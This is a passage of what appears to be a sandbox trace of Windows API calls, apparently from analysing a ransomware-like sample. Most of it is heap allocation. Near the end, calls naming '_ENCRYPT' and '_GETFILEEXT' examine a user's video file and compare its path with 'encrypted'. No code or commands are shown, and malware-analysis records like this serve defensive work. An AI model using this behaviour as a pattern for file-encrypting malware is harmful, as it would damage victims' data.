Size=0x10) returned 0x8899b8 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.809] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.811] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.811] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.812] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0043.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.813] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0043.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.813] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.813] CloseHandle (hObject=0x140) returned 1 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.814] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.814] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.814] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.815] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.815] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.815] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85ed130, ftCreationTime.dwHighDateTime=0x1d5c5dd, ftLastAccessTime.dwLowDateTime=0xfab68a0, ftLastAccessTime.dwHighDateTime=0x1d5c086, ftLastWriteTime.dwLowDateTime=0xfab68a0, ftLastWriteTime.dwHighDateTime=0x1d5c086, nFileSizeHigh=0x0, nFileSizeLow=0x118e5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Q6LtnsYYX SfRjU.flv", cAlternateFileName="Q6LTNS~1.FLV")) returned 0x7c20c0 [0043.815] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85ed130, ftCreationTime.dwHighDateTime=0x1d5c5dd, ftLastAccessTime.dwLowDateTime=0xfab68a0, ftLastAccessTime.dwHighDateTime=0x1d5c086, ftLastWriteTime.dwLowDateTime=0xfab68a0, ftLastWriteTime.dwHighDateTime=0x1d5c086, nFileSizeHigh=0x0, nFileSizeLow=0x118e5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Q6LtnsYYX SfRjU.flv", cAlternateFileName="Q6LTNS~1.FLV")) returned 0x7c20c0 [0043.815] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS 